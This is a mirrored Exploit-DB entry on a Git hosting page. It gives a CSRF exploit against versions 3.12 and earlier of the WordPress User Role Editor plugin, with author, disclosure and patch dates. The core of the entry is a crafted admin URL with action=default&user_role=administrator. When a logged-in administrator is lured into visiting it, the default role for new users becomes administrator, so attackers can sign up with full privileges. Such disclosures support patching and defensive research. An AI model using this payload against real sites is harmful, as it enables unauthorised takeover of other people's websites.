bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/25721.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

18 lines
No EOL
604 B
Text
Raw Permalink Blame History

# Exploit Title: WP User Role Editor CSRF
# Date: 19/5/13
# Exploit Author: Henry Hoggard
# Author Website: http://henryhoggard.co.uk
# Vendor Homepage:https://wordpress.org/support/plugin/user-role-editor
# Software Link:https://wordpress.org/support/plugin/user-role-editor
# Version: <=3.12
# Tested on: Debian
# CVE : none yet
Notified Dev: 16/05/13
Patch Released (3.14): 17/05/13
Description:
This allows you to sign up with admin privileges if you make the admin
visit your CSRF script.
http://server/wordpress/wp-admin/users.php?page=user-role-editor.php&action=default&user_role=administrator
Reference in a new issue View git blame Copy permalink